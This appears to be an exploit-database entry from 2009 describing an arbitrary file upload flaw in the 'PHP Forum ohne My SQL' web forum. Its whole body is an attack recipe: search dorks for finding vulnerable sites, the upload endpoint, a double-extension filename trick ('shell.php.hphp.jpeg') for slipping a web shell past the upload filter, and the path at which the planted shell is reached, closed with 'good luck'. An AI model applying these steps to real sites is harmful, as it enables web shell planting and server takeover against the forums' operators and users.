[] NeoSense

PHP Forum ohne My SQL - Arbitrary File Upload

Author: wlhaan hacker
type: webapps
platform: linux
port: 80.0
date_added: 2009-12-27 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

PHP Forum ohne My SQL Remote File Upload Vulnerability

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : Powered by GL-SH DEAF forum 6.5.5 final. #
# [+] or dork:"PHP Forum ohne My SQL" "thema.php?board""
#####################################################

The exploit :

http://localhost/path/upload.php


change shell

shell.php.hphp.jpeg


Get now shell :

http://localhost/path/imguploads/shell.php.hphp.jpeg


and good luck :D

Thanks to : shooq hacker ..

#####################################################